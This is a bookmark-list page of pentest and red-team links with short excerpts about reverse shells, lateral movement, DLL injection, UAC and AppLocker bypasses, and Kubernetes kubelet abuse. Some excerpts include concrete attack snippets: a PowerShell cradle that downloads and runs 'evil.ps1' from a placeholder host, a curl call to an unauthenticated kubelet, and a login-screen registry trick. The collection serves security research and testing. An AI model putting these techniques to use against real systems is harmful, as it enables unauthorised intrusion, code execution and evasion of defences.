recentpopularlog in

whip_lash : pentest   538

« earlier  
GitHub - proxycannon/proxycannon-ng: A private botnet using multiple cloud environments for pentesters and red teamers. - Built by the community during a hackathon at the WWHF 2018 security conference
We've created a on-demand proxy tool that leverages cloud environments giving a user the ability to source (all) your traffic from an endless supply of cloud based IP address. Think of it as your own private TOR network for your redteam and pentest engagements.
proxy  pentest  cloud 
21 hours ago by whip_lash
GitHub - sysdream/chashell
Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.
dns  shell  reverseshell  pentest 
21 hours ago by whip_lash
Run any app from Ease of Access button on Windows 10 login screen
To open Command Prompt using the Ease of Access button from the Windows 10 login screen, set the Debugger value data to the following value
windows  pentest  debug  registry 
3 days ago by whip_lash
impacket/wmiexec.py at master · SecureAuthCorp/impacket · GitHub
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages
# in the event log that smbexec.py does when creating a service.
wmi  psexec  pentest 
3 days ago by whip_lash
GitHub - FortyNorthSecurity/WMImplant: This is a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine. WMImpl
This is a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine. WMImplant is WMI based.
wmi  c2  windows  pentest 
3 days ago by whip_lash
Hybrid Cobalt Strike Redirectors · Zach Grace
Working for an organization with a strict data security policy puts a few challenges on a Red Team, especially when it comes to building robust infrastructure. m0ther_ and I set out to build a robust, multi-redirector infrastructure similar to what Raphael Mudge described in his blog post, Cloud-based Redirectors for Distributed Hacking, except we wanted to host the team server on-prem. The post below describes two iterations of infrastructure we built to meet our needs.
cobaltstrike  c2  pentest 
7 days ago by whip_lash
GitHub - secabstraction/PowerCat: A PowerShell TCP/IP swiss army knife.
Favorite tweet:

PowerCat : A PowerShell TCP/IP swiss army knife : https://t.co/xIrOZmZxER

— Binni Shah (@binitamshah) February 9, 2019
cli  netcat  powershell  windows  pentest 
8 days ago by whip_lash
Introducing Armory: External Pentesting Like a Boss
We are introducing Armory, a tool that adds a database backend to dozens of popular external and discovery tools. This allows you to run the tools directly from Armory, automatically ingest the results back into the database and use the new data to supply targets for other tools.  
pentest  tools 
12 days ago by whip_lash
Abusing Exchange: One API call away from Domain Admin - dirkjanm.io
In most organisations using Active Directory and Exchange, Exchange servers have such high privileges that being an Administrator on an Exchange server is enough to escalate to Domain Admin. Recently I came across a blog from the ZDI, in which they detail a way to let Exchange authenticate to attackers using NTLM over HTTP. This can be combined with an NTLM relay attack to escalate from any user with a mailbox to Domain Admin in probably 90% of the organisations I’ve seen that use Ex...
exchange  windows  security  pentest  activedirectory 
12 days ago by whip_lash
GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit tools
The default Active Directory ms-DS-MachineAccountQuota attribute setting allows all domain users to add up to 10 machine accounts to a domain. Powermad includes a set of functions for exploiting ms-DS-MachineAccountQuota without attaching an actual system to AD.
dns  exploit  pentest  powershell  activedirectory 
12 days ago by whip_lash
XXE that can Bypass WAF Protection – Wallarm
Unfortunately, bypasses exist for the WAFs of both categories.

Below we show several methods the bad guys can use to fool a WAF and get XXE through.
xxe  waf  webapp  pentest 
17 days ago by whip_lash
Webinar #1 | GoToStage.com
Learn the basics of post-exploitation from advanced infosec professionals

Join Carlos Perez (@darkoperator) as he shares some of the post-exploitation methodology used by TrustedSec security consultants performed during actual attack simulations. Each of the four individual webinars will focus on specific aspects that will build upon each other to give a complete picture of the post-exploitation process. New tools will also be released during each individual webinar.
pentest  postexploitation  video 
18 days ago by whip_lash
Pentesting Cheatsheets - Red Teaming Experiments
Convenient commands for your pentesting / red-teaming engagements, OSCP and CTFs.
pentest  cheatsheets 
19 days ago by whip_lash
Sh00T - A Testing Environment for Manual Security Testers - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
Sh00t
is a task manager to let you focus on performing security testing
provides To Do checklists of test cases
helps to create bug reports with customizable bug templates
pentest  security  tool  notes 
19 days ago by whip_lash
GitHub - TBGSecurity/splunk_shells: Weaponizing Splunk with reverse and bind shells.
This app is to help with penetration testing and Red Teaming within environments that have a Splunk deployment.

This app will allow the engineer to spawn a Reverse of Bind Shell from a Splunk server to allow the engineer to interact with the server and expand influence within the environment.
splunk  pentest 
25 days ago by whip_lash
Linux Privilege Escalation – Using apt-get/apt/dpkg to abuse sudo “NOPASSWD” misconfiguration – Logan S Diomedi – lsdsecurity
There are many well known and documented attack vectors for the sudo command that exist. Please see my Useful Resources page for the Windows & Linux Privilege Escalation piece that contains a ton of helpful knowledge in this category. Today, we’re going to be using a very poorly documented feature in apt-get when a normal user is allowed to execute apt-get as a root user. Let’s dive in!
linux  privesc  privilegeescalation  sudo  pentest  security 
29 days ago by whip_lash
us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely
embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is
extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to
directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable
application into a potential pivot point.
templateinjection  webapp  pentest 
4 weeks ago by whip_lash
owasp_SSTI_final
Occurs when invalid user input is embedded into the template
engine
• Often XSS attack occurs but SSTI can be missed
• Can lead to a remote code execution (RCE)
• Developer error or intentional exposure
templateinjection  webapp  pentest 
4 weeks ago by whip_lash
PRETty - "PRinter Exploitation Toolkit" LAN Automation Tool - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
PRETty is useful when a large number of printers are present on a network. Instead of scanning, logging, and manually running PRET againt each individual printer, PRETty will automatically discover and run choosen PRET payloads against all printers on the target network. Additionally, PRETty can be used to automate command/payload delivery to any given list of printers (See the "Lists" section)
printer  pentest 
4 weeks ago by whip_lash
www.agarri.fr
Favorite tweet:

If you like this kind of @Burp_Suite tips, here's ~100 pages of them. That was published in 2013 but most of it is still valid. https://t.co/2UNQEtQZHV https://t.co/j1LUyEo0lD

— Nicolas Grégoire (@Agarri_FR) January 16, 2019
burp  proxy  pentest 
4 weeks ago by whip_lash
Kubernetes: unauth kublet API 10250 token theft & kubectl Carnal0wnage - Attack Research Blog Carnal0wnage & Attack Research Blog
do a curl -s https://k8-node:10250/runningpods/ to get a list of running pods

With that data, you can craft your post request to exec within a pod so we can poke around.
kubernetes  pentest  security  vulnerability 
4 weeks ago by whip_lash
Kubernetes: unauth kublet API 10250 basic code exec Carnal0wnage - Attack Research Blog Carnal0wnage & Attack Research Blog
Unauth API access (10250)

Most Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the "insecure API service" option.


Everybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.
kubernetes  security  pentest  vulnerability 
4 weeks ago by whip_lash
us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent Asynchronous-And-Fileless-Backdoor-wp.pdf
As technology is introduced and subsequently deprecated over time in the Windows operating system,
one powerful technology that has remained consistent since Windows NT 4.01
and Windows 952
is
Windows Management Instrumentation (WMI). Present on all Windows operating systems, WMI is
comprised of a powerful set of tools used to manage Windows systems both locally and remotely.
powershell  wmi  pentest  postexploitation 
4 weeks ago by whip_lash
GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool
Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.
injection  template  pentest  webapp 
4 weeks ago by whip_lash
GitHub - Bashfuscator/Bashfuscator: A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
Favorite tweet:

Introducing Bashfuscator : A fully configurable and extendable Bash obfuscation framework : https://t.co/vOjDFzSQmF cc @capnspacehook

— Binni Shah (@binitamshah) January 14, 2019
bash  obfuscation  pentest 
4 weeks ago by whip_lash
Attacking Kubernetes through Kubelet
Favorite tweet:

Attacking Kubernetes through Kubelet : https://t.co/wMmGlTJZv6 pic.twitter.com/avPhhMNXMI

— Binni Shah (@binitamshah) January 14, 2019
kubernetes  pentest  vulnerability  security 
4 weeks ago by whip_lash
Bypassing Crowdstrike Falcon detection, from phishing email to reverse shell - Malware - 0x00sec - The Home of the Hacker
When I say bypassing, I mean completely bypass detection, from the phishing email received by the user to the reverse shell. Something realistic, not just writing a malware and see if it gets executed.

So if we can’t use the classic techniques, about trying some new (old) trick?

Turns out, it was pretty trivial ¯\_(ツ)_/¯.
malware  pentest  antivirus 
4 weeks ago by whip_lash
Powershell Script for Enumerating Vulnerable DCOM Applications: DCOMrade
   DCOMrade is a Powershell script that is able to enumerate the possible vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. The script is build to work with Powershell 2.0 but will work with all versions above as well.
dcom  windows  pentest  powershell  postexploitation  security 
5 weeks ago by whip_lash
Lateral Movement via DCOM: Round 2 | enigma0x3
This resulted in identifying the MMC20.Application COM object and its “ExecuteShellCommand” method, which you can read more about here. Thanks to the help of James Forshaw (@tiraniddo), we determined that the MMC20.Application object lacked explicit “LaunchPermissions”, resulting in the default permission set allowing Administrators access:
dcom  security  windows  postexploitation  pentest 
5 weeks ago by whip_lash
Dump LAPS password in clear text – Akijosberry
By Default all the Domain Admins have view access to ms-MCS-AdmPwd attribute. Lets have a look at the following ways in which we can dump the LAPS password
account  ad  directory  pentest  postexploitation 
5 weeks ago by whip_lash
GitHub - malcomvetter/DnsCache
This is a reference example for how to call the Windows API to enumerate cached DNS records in the Windows resolver. Proof of concept or pattern only.
github  dns  pentest  postexploitation 
6 weeks ago by whip_lash
flAWS2.cloud
flAWS 2 has two paths this time: Attacker and Defender! In the Attacker path, you'll exploit your way through misconfigurations in serverless (Lambda) and containers (ECS Fargate). In the Defender path, that target is now viewed as the victim and you'll work as an incident responder for that same app, understanding how an attack happened. You'll get access to logs of a previous successful attack. As a Defender you'll learn the power of jq in analyzing logs, and instructions on how to set up Athena in your own environment.
aws  security  pentest  pentesting  ctf  tutorial 
6 weeks ago by whip_lash
Laudanum download | SourceForge.net
Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.
webapp  pentest  webshell 
8 weeks ago by whip_lash
A common path to Domain Admin - Laconic Wolf
Many common information gathering techniques and tools require you to be a part of the domain to use them (net users, etc.), so I decided to write a few IronPython scripts (located here) to do some basic enumeration tasks. I’m not going to get into the specifics of the code, but the first two scripts I wrote were a script to get a list of users and a script to guess passwords.
ironpython  bloodhound  activedirectory  privesc  privilegeescalation  pentest  pentesting 
8 weeks ago by whip_lash
Inside of Danderspritz post-exploitation modules – Wojciech – Medium
Most of the scripts are in “Ops” directory, inside “Windows” catalog which deserve additional attention, you can find full list here.

How to setup lab, run Fuzzbunch and Danderspritz here.

Everything was said about this framework, so I will focus only on post-exploitation modules. At the end of article, I will show how to write your own plugin, so bear with me.
postexploitation  nsa  danderspritz  pentest  tools 
8 weeks ago by whip_lash
SharpPack: The Insider Threat Toolkit – MDSec
Most of our favourite tools in the red team arsenal are developed in DotNet or PowerShell and there exists numerous ways to execute these from memory when operating from your implant such as CobaltStrike’s powerpick and execute-assembly methods. In our use case, we were operating without an implant but still wanted to reap the benefits of GhostPack, Internal Monologue et al and therefore we had to get a little more creative with our tradecraft. As previously noted, we were operating in an environment with tight application whitelisting so recompiling and obfuscating our chosen tools was just not an option. We did however observe two notable opportunities to get code execution as the environment made heavy use of VBScript (thanks Tanium :)) and locally created Office Macro enabled documents.
dotnet  malware  pentest  vbscript 
8 weeks ago by whip_lash
BMC Patrol Agent - Domain User to Domain Admin – Securifera
After verifying that we could use patrolcli to connect to any other patrol agent client using a regular domain user, we pointed it to the domain controller and were able to successfully execute commands as SYSTEM on the DC.
patrol  vulnerability  windows  pentest  privilegeescalation  domain  bmc 
8 weeks ago by whip_lash
Punk.Py - Unix SSH Post-Exploitation Tool - KitPloit - PenTest & Hacking Tools for your CyberSecurity Kit ☣
punk.py is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collect usernames, ssh keys and known hosts from a unix system, then it tries to connect via ssh to all the combinations found. punk.py is wrote in order to work on standard python2 and python3 installations.
ssh  postexploitation  pentest 
8 weeks ago by whip_lash
Windows C++ app hosts CLR 4 and invokes .NET assembly (CppHostCLR) sample in C#, C++ for Visual Studio 2010
The code sample uses the CLR 4 hosting APIs to host CLR in a native C++ project, load and invoke .NET assemblies
postexploitation  malware  pentest 
9 weeks ago by whip_lash
AppLocker CLM Bypass via COM – MDSec
I won’t cover the internals of this code here (I recommend you read through Microsoft’s post here if you are interested), but the end-result is that the DLL will load the .NET CLR, followed by a .NET assembly, and pass execution to the specified method.

With this completed, we now have access to .NET, and more importantly, .NET’s reflective capability. Next we need to figure out just where Constrained Language Mode’s on/off switch is.
applocker  postexploitation  windows  pentest 
9 weeks ago by whip_lash
Concealing Network Traffic via Google Translate | Running the Gauntlet
This translate proxying method is often used by the malware if their domain or IP is blocked. The malware uses either Google Translate, Bing Translator, or Yahoo! Babel Fish for this purpose. The malware sends HTTP GET requests using the following strings, where *URL* is the URL they wish to access
malware  pentest  proxy  google 
9 weeks ago by whip_lash
HTTP Proxy Authentication for Malware | Strategic Cyber LLC
The proxy username and password, when stored in the credential store, are available to any application that runs as the current user. If my target uses Internet Explorer and uses the Remember my credentials option to save retyping, then Meterpreter and Beacon get a free pass to authenticate and communicate through the configured proxy server—no code changes required. Better, these remembered credentials survive a reboot too.
proxy  pentest 
9 weeks ago by whip_lash
Research on CMSTP.exe – MSitPros Blog
Whenever I have a chance I use my time diving into Windows internal binaries to uncover hidden functionality. This blogpost is dedicated to things I have discovered with the CMSTP.exe binary file.
I found a UAC Bypass using sendkeys and a way to load DLL files from a Webdav server.
pentest  postexploitation  evasion  uac 
9 weeks ago by whip_lash
Anti-forensic and File-less Malware - Malware - 0x00sec - The Home of the Hacker
One of the most advantageous attributes for a malware to have is survival as a means to maintain persistence and to evade detection by security solutions. Since developing a full-blown piece of malware requires expensive resources, this trait becomes increasingly desireable to continuously remain unknown and undetected.
malware  pentest  tutorial 
9 weeks ago by whip_lash
GitHub - pwndizzle/c-sharp-memory-injection: A set of scripts that demonstrate how to perform memory injection in C#
A set of scripts that demonstrate how to perform memory injection.

I've tried to make these techniques as simple and opsec safe as possible, avoiding unnecessary memory modifications, process or file creation. I'm no C# expert or memory injection guru so use these examples at your own risk :)
c#  pentest  postexploitation 
9 weeks ago by whip_lash
subTee
In the example below I demonstrate the ability to load an arbitrary exe into csi.exe. This can be loaded from a basic text file. This is done on a PC running Windows Device Guard.
c#  windows  pentest  deviceguard 
9 weeks ago by whip_lash
From blind XXE to root-level file read access | Honoki
Below, I will outline the thought process that helped me make sense of what I encountered, and that in the end allowed me to elevate what seemed to be a medium-criticality vulnerability into a critical finding.

I will put deliberate emphasis on the various error messages that I encountered in the hope that it can point others in the right direction in the future.
java  security  xxe  pentest 
9 weeks ago by whip_lash
GitHub - stephenfewer/ReflectiveDLLInjection: Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process.
Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.
malware  pentest 
9 weeks ago by whip_lash
Detecting reflective DLL loading with Windows Defender ATP - Microsoft Secure
A crucial aspect of reflectively loading a DLL is to have executable memory available for the DLL code. This can be accomplished by taking existing memory and changing its protection flags or by allocating new executable memory. Memory procured for DLL code is the primary signal we use to identify reflective DLL loading.

In Windows 10 Creators Update, we instrumented function calls related to procuring executable memory, namely VirtualAlloc and VirtualProtect, which generate signals for Windows Defender Advanced Threat Protection (Windows Defender ATP). Based on this instrumentation, we’ve built a model that detects reflective DLL loading in a broad range of high-risk processes, for example, browsers and productivity software.
malware  pentest 
9 weeks ago by whip_lash
Reflective DLL Injection with PowerShell | clymb3r
The script currently allows you to load a DLL from a local file (and execute it remotely) or retrieving the DLL from a URL. It is also possible and easy to modify the script with a hardcoded DLL byte array; I recommend doing this for any DLL you plan on using often.
powershell  malware  pentest 
9 weeks ago by whip_lash
DOUBLEPULSAR Usermode Analysis: Generic Reflective DLL Loader | Countercept
We have released a small utility that can be used to invoke the usermode DLL loading mechanism of the DOUBLEPULSAR payload in order to test detection mechanisms and perform further research. This will use the shellcode to inject a DLL into a process of your choice, entirely from usermode.

 

The utility is available here. 
malware  pentest 
9 weeks ago by whip_lash
sRDI - Shellcode Reflective DLL Injection | Silent Break Security
“You can now convert any DLL to position independent shellcode at any time, on the fly.”

This tool is mainly relevant to people who write/customize malware. If you don’t know how to write a DLL, I doubt most of this applies to you. With that said, if you are interested in writing something more than a PowerShell script or Py2Exe executable to perform red-teaming, this is a great place to start.
malware  pentest 
9 weeks ago by whip_lash
New lateral movement techniques abuse DCOM technology
The instantiation of a remote DCOM object behaves as follows:

The client machine requests an instantiation of an object denoted by a CLSID from a remote machine. If the client uses a ProgID, it is first resolved locally to a CLSID.
The remote machine checks if there is an AppID associated with the CLSID in question, and verifies the permissions of the client.
If all goes well, the DCOMLaunch service creates an instance of the requested class, most commonly by running the executable of the LocalServer32 subkey, or by creating a DllHost process to host a dll referenced by the InProcServer32 subkey.
Communication is established between the client application and the server process. In most cases, the new process is created in the session associated with the DCOM communication.
The client is then able to access the members and methods of the newly created object.
dcom  pentest  postexploitation 
9 weeks ago by whip_lash
Being a Good Domain Shepherd – Posts By SpecterOps Team Members
DomainCheck pulls a list of domains registered under the provided Namecheap account, collects the DNS records set for each domain, and then reviews each one to ensure it is ready to be used. This involves checking to see if WhoisGuard is enabled, the domain is not expired, the domain is properly categorized, the domain has not been flagged in VirusTotal or tagged with a bad category, and the domain is not blacklisted for spam.

The DomainReview class uses the following sources to check the health of a domain name:

Cisco Talos
Bluecoat
IBM X-Force
Fortiguard
TrendMicro
OpenDNS
MXToolbox
VirusTotal
Cymon
c2  domain  tool  pentest 
10 weeks ago by whip_lash
GitHub - yeyintminthuhtut/Awesome-Red-Teaming: List of Awesome Red Teaming Resources
Favorite tweet:

Awesome Red Teaming.

Initial Access
Execution
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Command and Control
Misc
RedTeam Gadgets
Ebooks
Training
Certificationhttps://t.co/rwMhVbtBAi

— Emad Shanab (@Alra3ees) December 8, 2018
pentest  pentesting  redteam 
10 weeks ago by whip_lash
Using C# for post-PowerShell attacks | Forcepoint
A blog post by Forty North Security built on Matt Graber’s research into Microsoft.Workflow.Compiler.exe and demonstrated that you can use the technique to run shellcode on a machine. In both cases the authors used a local payload file and, while it may seem a minor difference, we wanted to see if it was possible to compile and execute a file hosted remotely.
windows  pentest  c# 
10 weeks ago by whip_lash
Red XOR Blue: SharpCradle - Loading remote C# binaries and executing them in memory
SharpCradle isn't exactly the same as our traditional powershell download cradle ( IEX (New-Object Net.Webclient).downloadstring("http://IP/evil.ps1") ) but the concept, at least to me, is the same.  We are simply reaching out from our victim's machine to somewhere remotely and retrieving our evil code and executing it in memory.  This helps in bypassing endpoint protections by making it harder to detect what exactly we are up to.  In fact, I have used this on a wide variety of client engagements and it has yet to get flagged, though I am sure that will eventually change as defenses are getting better every day.
c#  pentest  security 
10 weeks ago by whip_lash
Provadys Offensive Security Blog
Last May, Casey Smith pointed out on twitter and on his blog that the .NET profiler DLL loading can be abused to make a legit .NET application load a malicious DLL using environment variables.

When reading this, first thing that came to mind was "if this works with elevated .NET processes, this would make a nice UAC bypass as well". And sure enough, it does.

This issue is still unfixed as of this writing – and may remain so – but is already public since July, as it was independently discovered, reported and published on Full Disclosure by Stefan Kanthak.
hacking  uac  windows  pentest 
10 weeks ago by whip_lash
Improved call-home SSH scripts | TXLAB
In the new approach, the remote stations have all the same ssh_tunnel.sh script, and they only differ in SSH keys. It;s important to have unique SSH key on each machine, in order to be able to quickly disable access if the host is compromised.
ssh  pentest  pentesting 
10 weeks ago by whip_lash
Call-home SSH scripts | TXLAB
Here’s the startup script /etc/init.d/callhome_ssh_tunnel which brings up the tunnel at the computer boot
ssh  pentest  pentesting 
10 weeks ago by whip_lash
Classic 802.1x Bypass · s0lst1c3/silentbridge Wiki · GitHub
The classic 802.1x bypass is by far the simplest to perform, and is effective against 802.1x-2004 and 802.1x-2001
802.1x  portsecurity  nac  pentest  pentesting 
10 weeks ago by whip_lash
A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity – Robert M. Lee
I commonly get asked by folks what approach they should take to get started in industrial control system (ICS) cybersecurity. Sometimes these individuals have backgrounds in control systems, sometimes they have backgrounds in security, and sometimes they are completely new to both.
ics  security  pentest 
10 weeks ago by whip_lash
GitHub - infosecn1nja/AD-Attack-Defense: Active Directory Security For Red & Blue Team
This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
activedirectory  pentest 
10 weeks ago by whip_lash
« earlier      
per page:    204080120160

Copy this bookmark:





to read